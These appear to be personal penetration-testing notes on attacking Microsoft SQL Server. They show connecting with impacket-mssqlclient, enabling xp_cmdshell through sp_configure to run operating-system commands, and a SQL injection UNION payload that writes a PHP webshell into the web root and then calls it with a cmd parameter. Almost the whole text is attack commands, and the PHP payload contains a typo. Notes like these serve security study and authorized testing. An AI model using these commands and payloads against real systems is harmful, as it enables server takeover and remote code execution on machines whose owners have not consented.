MSSQL

Enumeration

impacket-mssqlclient

impacket has a tool to connect to sql via cmd line

impacket-mssql user:pass@ipaddr -windows-auth

trying to get a shell

EXECUTE sp_configure 'show advance options', 1;

##need to make the change permenante
RECONFIGURE;

##execute cmd shell
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

##to run commands use
EXECUTE xp_cmdshell 'whoami';

injecting code to gain a webshell

#to write files on the webserver (start will one Null then incease the amounts

' UNION SELECT "<?php system($_GET['cmd']};?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

##If this adds the file, navigate to the path and add the cmd paramater
<ip>/tmp/webshell.php?cmd=whoami